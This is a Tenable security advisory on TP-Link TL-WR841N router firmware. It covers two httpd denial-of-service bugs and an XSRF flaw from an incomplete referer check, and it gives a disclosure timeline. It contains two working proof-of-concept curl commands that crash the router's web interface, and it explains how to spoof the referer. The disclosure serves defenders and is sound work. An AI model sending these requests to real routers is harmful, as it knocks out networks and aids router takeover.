Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

[R1] TP-Link TL-WRN841N Multiple Vulnerabilities

Critical
← View More Research Advisories

Synopsis

Tenable was recently investigating TP-Link's TL-WR841N v13 using firmware 0.9.1 4.16 v0348.0 (listed as TL-WR841N(US)_V13_180119 on the download page). As a result, Tenable found multiple vulnerabilities.

CVE-2018-15700: httpd Denial of Service via Referer Header

A locally connected user sending an HTTP request with a missing protocol string in the "Referer" field will result in the httpd service terminating. We believe this is a NULL pointer dereference error in the http_parser_main function. The problem starts with a memcmp looking for "http://" in the first seven bytes of the "Referer" field. Only if this succeeds will a "Referer" string variable be initialized. When the memcmp fails the program flow still continues and attempts string operations on the uninitialized NULL string. The resulting crash requires a router reboot to revive httpd web interface.

curl 'http://tplinkwifi.net/' -H 'Connection: keep-alive' -H 'Cache-Control: max-age=0' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'Referer: DOS' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.9' --compressed

CVE-2018-15701: httpd Denial of Service via Cookie Header

Crafting an HTTP request with an HTTP "Cookie" field of "Authorization;" will result in the httpd service terminating. Again, a router reboot is required to revive the web interface. We believe this is another parsing error in "http_parser_main".

curl 'http://tplinkwifi.net/' -H 'Connection: keep-alive' -H 'Cache-Control: max-age=0' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'Referer: http://tplinkwifi.net/' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.9' -H 'Cookie: Authorization;' --compressed

CVE-2018-15702: XSRF due to Incomplete Referer Check

In the http_parser_main function, referer whitelisting is accomplished using strncmp with a length field derived from "tplinklogin.net", "tplinkwifi.net", or router IP strings. Since strncmp is only comparing the first few characters of the referer domain string, an attacker can pass this check by crafting a domain or subdomain of "tplinklogin.net**", "tplinkwifi.net*", or "<router's IP>*".

This issue is magnified in severity due to a previously disclosed but unpatched authentication bypass vulnerability (CVE-2018-11714). This allows a remote attacker to perform XSRF to various sensitive cgi scripts. A remote attacker is able enable remote management and reset the router admin password.

Solution

Currently no solution exists. At time of publication, the most recent firmware version on TP-Link's website is listed as TL-WR841N(US)_V13_180119 which is the vulnerable firmware version (0.9.1 4.16 v0348.0).

Additional References

http://blog.securelayer7.net/time-to-disable-tp-link-home-wifi-router/

Disclosure Timeline

07-02-2018 - Tenable sends vulnerability write up and proof of concepts to TP-Link.
07-18-2018 - Tenable asks TP-Link for acknowledgement.
07-18-2018 - TP-Link says all the bugs already fixed. Suggests Tenable verifies using the latest firmware.
07-27-2018 - Tenable confirms the vulnerabilities still exist in the latest build (0.9.1 4.16 v0348.0 Build 180119 Rel 66498n). Tenable asks if there is a more recent unpublished build.
07-27-2018 - TP-Link says they will check the firmware and let Tenable know.
08-27-2018 - Tenable asks for an update.
08-27-2018 - TP-Link asks for hardware version and firmware version.
08-27-2018 - Tenable responds TL-WR841N V13 0.9.1 4.16 v0348.0 Build 180119 Rel 66498n
08-27-2018 - TP-Link sends a beta firmware for Tenable to test.
08-27-2018 - TP-Link follows up that they hope for feedback ASAP.
08-27-2018 - Tenable can't download the rar attachment via email.
08-27-2018 - TP-Link suggests using we-transfer.
08-27-2018 - Tenable agrees.
08-30-2018 - Tenable asks TP-Link for an update.
08-30-2018 - TP-Link says they sent a we-transfer. They'll try again.
08-30-2018 - Tenable receive receipt of the firmware (0.9.1 4.16 v0348.0 Build 180821 Rel.42708n(Beta)) and confirms that two vulnerabilities still exist.
08-30-2018 - TP-Link notifies Tenable of another we-transfer.
08-30-2018 - Tenable informs TP-Link that they sent the exact same firmware as before.
09-20-2018 - Tenable asks TP-Link for an update.
09-20-2018 - TP-Link says they already sent the beta version.
09-20-2018 - Tenable says they haven't received anything new.
09-20-2018 - TP-Link says we-transfer informed them that Tenable downloaded the firmware. Asks Tenable for an email address that doesn't block rar files.
09-20-2018 - Tenable reiterates that the last downloaded version was vulnerable. Tenable asks for a new version via we-transfer.
10-01-2018 - Tenable reminds TP-Link that today is the 90 day disclosure day.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Try for Free Buy Now
Tenable.io FREE FOR 30 DAYS

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Sign up now.

Tenable.io BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

65 assets

Choose Your Subscription Option:

Buy Now
Try for Free Buy Now

Try Nessus Professional Free

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy Nessus Professional

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year. Full details here.

Buy Now
Renew an existing license | Find a reseller
Try for Free Buy Now

Try Tenable.io Web Application Scanning

FREE FOR 30 DAYS

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Buy Tenable.io Web Application Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try for Free Contact Sales

Try Tenable.io Container Security

FREE FOR 30 DAYS

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

Buy Tenable.io Container Security

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

Try for Free Contact Sales

Try Tenable Lumin

FREE FOR 30 DAYS

Visualize and explore your Cyber Exposure, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Buy Tenable Lumin

Contact a Sales Representative to see how Lumin can help you gain insight across your entire organization and manage cyber risk.